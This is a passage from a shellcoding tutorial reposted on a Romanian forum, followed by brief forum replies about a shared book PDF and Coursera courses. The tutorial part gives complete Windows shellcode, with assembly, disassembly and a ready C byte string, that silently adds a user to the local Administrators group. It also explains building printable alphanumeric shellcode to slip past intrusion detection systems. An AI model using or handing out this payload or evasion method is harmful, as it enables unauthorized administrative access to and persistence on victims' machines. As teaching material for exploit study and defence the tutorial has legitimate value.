within minutes. This example shows the process of ensuring that certain DLLs are loaded into a process space. Once the address of the MessageBoxA function is obtained ExitProcess is called to make sure that the program ends without crashing. Example 3 - Adding an Administrative Account This third example is actually quite a bit simpler than the previous shellcode, but this code allows the exploiter to add a user to the remote system and give that user administrative privileges. This code does not require the loading of extra libraries into the process space because the only functions we will be using are WinExec and ExitProcess. Note: the idea for this code was taken from the Metasploit project mentioned above. The difference between the shellcode is that this code is quite a bit smaller than its counterpart, and it can be made even smaller by removing the ExitProcess function! G:\>arwin kernel32.dll ExitProcess arwin - win32 address resolution program - by steve hanna - v.01 ExitProcess is located at 0x77e798fd in kernel32.dll G:\>arwin kernel32.dll WinExec arwin - win32 address resolution program - by steve hanna - v.01 WinExec is located at 0x77e6fd35 in kernel32.dll ;adduser.asm [Section .text] global _start _start: jmp short GetCommand CommandReturn: pop ebx ;ebx now holds the handle to the string xor eax,eax push eax xor eax,eax ;for some reason the registers can be very volatile, did this just in case mov [ebx + 89],al ;insert the NULL character push ebx mov ebx,0x77e6fd35 call ebx ;call WinExec(path,showcode) xor eax,eax ;zero the register again, clears winexec retval push eax mov ebx, 0x77e798fd call ebx ;call ExitProcess(0); GetCommand: ;the N at the end of the db will be replaced with a null character call CommandReturn db "cmd.exe /c net user USERNAME PASSWORD /ADD && net localgroup Administrators /ADD USERNAMEN" steve hanna@1337b0x:~$ nasm -f elf adduser.asm; ld -o adduser adduser.o; objdump -d adduser adduser: file format elf32-i386 Disassembly of section .text: 08048080 <_start>: 8048080: eb 1b jmp 804809d 08048082 : 8048082: 5b pop %ebx 8048083: 31 c0 xor %eax,%eax 8048085: 50 push %eax 8048086: 31 c0 xor %eax,%eax 8048088: 88 43 59 mov %al,0x59(%ebx) 804808b: 53 push %ebx 804808c: bb 35 fd e6 77 mov $0x77e6fd35,%ebx 8048091: ff d3 call *%ebx 8048093: 31 c0 xor %eax,%eax 8048095: 50 push %eax 8048096: bb fd 98 e7 77 mov $0x77e798fd,%ebx 804809b: ff d3 call *%ebx 0804809d : 804809d: e8 e0 ff ff ff call 8048082 80480a2: 63 6d 64 arpl %bp,0x64(%ebp) 80480a5: 2e cs 80480a6: 65 gs 80480a7: 78 65 js 804810e 80480a9: 20 2f and %ch,(%edi) 80480ab: 63 20 arpl %sp,(%eax) 80480ad: 6e outsb %ds:(%esi),(%dx) 80480ae: 65 gs 80480af: 74 20 je 80480d1 80480b1: 75 73 jne 8048126 80480b3: 65 gs 80480b4: 72 20 jb 80480d6 80480b6: 55 push %ebp 80480b7: 53 push %ebx 80480b8: 45 inc %ebp 80480b9: 52 push %edx 80480ba: 4e dec %esi 80480bb: 41 inc %ecx 80480bc: 4d dec %ebp 80480bd: 45 inc %ebp 80480be: 20 50 41 and %dl,0x41(%eax) 80480c1: 53 push %ebx 80480c2: 53 push %ebx 80480c3: 57 push %edi 80480c4: 4f dec %edi 80480c5: 52 push %edx 80480c6: 44 inc %esp 80480c7: 20 2f and %ch,(%edi) 80480c9: 41 inc %ecx 80480ca: 44 inc %esp 80480cb: 44 inc %esp 80480cc: 20 26 and %ah,(%esi) 80480ce: 26 20 6e 65 and %ch,%es:0x65(%esi) 80480d2: 74 20 je 80480f4 80480d4: 6c insb (%dx),%es:(%edi) 80480d5: 6f outsl %ds:(%esi),(%dx) 80480d6: 63 61 6c arpl %sp,0x6c(%ecx) 80480d9: 67 72 6f addr16 jb 804814b 80480dc: 75 70 jne 804814e 80480de: 20 41 64 and %al,0x64(%ecx) 80480e1: 6d insl (%dx),%es:(%edi) 80480e2: 69 6e 69 73 74 72 61 imul $0x61727473,0x69(%esi),%ebp 80480e9: 74 6f je 804815a 80480eb: 72 73 jb 8048160 80480ed: 20 2f and %ch,(%edi) 80480ef: 41 inc %ecx 80480f0: 44 inc %esp 80480f1: 44 inc %esp 80480f2: 20 55 53 and %dl,0x53(%ebp) 80480f5: 45 inc %ebp 80480f6: 52 push %edx 80480f7: 4e dec %esi 80480f8: 41 inc %ecx 80480f9: 4d dec %ebp 80480fa: 45 inc %ebp 80480fb: 4e dec %esi Replace the code at the top with: char code[] = "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\xbb\x35\xfd\xe6\x77"\ "\xff\xd3\x31\xc0\x50\xbb\xfd\x98\xe7\x77\xff\xd3\xe8\xe0\xff\xff\xff"\ "\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"\ "\x65\x72\x20\x55\x53\x45\x52\x4e\x41\x4d\x45\x20\x50\x41\x53\x53\x57"\ "\x4f\x52\x44\x20\x2f\x41\x44\x44\x20\x26\x26\x20\x6e\x65\x74\x20\x6c"\ "\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73"\ "\x74\x72\x61\x74\x6f\x72\x73\x20\x2f\x41\x44\x44\x20\x55\x53\x45\x52"\ "\x4e\x41\x4d\x45\x4e"; When this code is executed it will add a user to the system with the specified password, then adds that user to the local Administrators group. After that code is done executing, the parent process is exited by calling ExitProcess. Advanced Shellcoding This section covers some more advanced topics in shellcoding. Over time I hope to add quite a bit more content here but for the time being I am very busy. If you have any specific requests for topics in this section, please do not hesitate to email me. Printable Shellcode The basis for this section is the fact that many Intrustion Detection Systems detect shellcode because of the non-printable characters that are common to all binary data. The IDS observes that a packet containts some binary data (with for instance a NOP sled within this binary data) and as a result may drop the packet. In addition to this, many programs filter input unless it is alpha-numeric. The motivation behind printable alpha-numeric shellcode should be quite obvious. By increasing the size of our shellcode we can implement a method in which our entire shellcode block in in printable characters. This section will differ a bit from the others presented in this paper. This section will simply demonstrate the tactic with small examples without an all encompassing final example. Our first discussion starts with obfuscating the ever blatant NOP sled. When an IDS sees an arbitrarily long string of NOPs (0x90) it will most likely drop the packet. To get around this we observe the decrement and increment op codes: OP Code Hex ASCII inc eax 0x40 @ inc ebx 0x43 C inc ecx 0x41 A inc edx 0x42 B dec eax 0x48 H dec ebx 0x4B K dec ecx 0x49 I dec edx 0x4A J It should be pretty obvious that if we insert these operations instead of a NOP sled then the code will not affect the output. This is due to the fact that whenever we use a register in our shellcode we wither move a value into it or we xor it. Incrementing or decrementing the register before our code executes will not change the desired operation. So, the next portion of this printable shellcode section will discuss a method for making one's entire block of shellcode alpha-numeric-- by means of some major tomfoolery. We must first discuss the few opcodes that fall in the printable ascii range (0x33 through 0x7e). sub eax, 0xHEXINRANGE push eax pop eax push esp pop esp and eax, 0xHEXINRANGE Surprisingly, we can actually do whatever we want with these instructions. I did my best to keep diagrams out of this talk, but I decided to grace the world with my wonderful ASCII art. Below you can find a diagram of the basic plan for constructing the shellcode. The plan works as follows: -make space on stack for shellcode and loader -execute loader code to construct shellcode -use a NOP bridge to ensure that there aren't any extraneous bytes that will crash our code. -profit But now I hear you clamoring that we can't use move nor can we subtract from esp because they don't fall into printable characters!!! Settle down, have I got a solution for you! We will use subtract to place values into EAX, push the value to the stack, then pop it into ESP. Now you're wondering why I said subtract to put values into EAX, the problem is we can't use add, and we can't directly assign nonprintable bytes. How can we overcome this? We can use the fact that each register has only 32 bits, so if we force a wrap around, we can arbitrarily assign values to a register using only printable characters with two to three subtract instructions. If the gears in your head aren't cranking yet, you should probably stop reading right now. The log awaited ASCII diagram 1) EIP(loader code) --------ALLOCATED STACK SPACE--------ESP 2) ---(loader code)---EIP-------STACK------ESP--(shellcode-- 3) ----loadercode---EIP@ESP----shellcode that was builts--- So, that diagram probably warrants some explanation. Basically, we take our already written shellcode, and generate two to three subtract instructions per four bytes and do the push EAX, pop ESP trick. This basically places the constructed shellcode at the end of the stack and works towards the EIP. So we construct 4 bytes at a time for the entirety of the code and then insert a small NOP bridge (indicated by @) between the builder code and the shellcode. The NOP bridge is used to word align the end of the builder code. Example code: and eax, 0x454e4f4a ; example of how to zero out eax(unrelated) and eax, 0x3a313035 push esp pop eax sub eax, 0x39393333 ; construct 860 bytes of room on the stack sub eax, 0x72727550 sub eax, 0x54545421 push eax ; save into esp pop esp Oh, and I forgot to mention, the code must be inserted in reverse order and the bytes must adhere to the little endian standard. That job sounds incredibly tedious, thank god that matrix wrote a tool that does it for us! The point is that now you can use this utility only once you understand the concepts presented above. Remember, if you don't understand it, you're just another script kiddie. Further Reading Below is a list of great resources that relate to shellcoding. I suggest picking up a copy of all of the documents listed, but if that is an impossibility, at the very least get The Shellcoder's Handbook; it is a pure goldmine of information. The Shellcoder's Handbook by Jack Koziol et al Hacking - The Art of Exploitation by Jon Erickson "Understanding Windows Shellcode" by nologin.org Conclusion At this point the reader should be able to write at the very least basic shellcode to exploit applications on either the windows or linux platforms. The tricks demonstrated here will help a shellcoder understand other's shellcode and modify prewritten shellcode to fit the situation at hand. Shellcoding is always looked at as a minor detail of hacking a piece of software but invariably, a hack is only as strong enough as its weakest link. If the shellcode doesn't work, then the attempt at breaking the software fails; that is why it is important to understand all aspect of the process. Otherwise, good luck and have fun shellcoding! Sursa Am gasit cartea "The Shellcoders handbook" si am incarcat-o aici: the_shellcoders_handbook.pdf

Eu ma uitam la alte treburi serioase. Moneyyyy $$$$$$$ Adica aici: https://share.coursera.org/wiki/index.php/Behavioralecon:The_Psychology_of_Money

M-am bagat dar probabil o sa vizionez doar materialele video. Documentele de la wiki o sa le tin minte ca referinta in caz ca o sa am nevoie de resurse in domeniu.

Recomand cursurile de pe coursera! //Begood e mincinos. // Eu i-am dat pagina, nu el a gasit-o.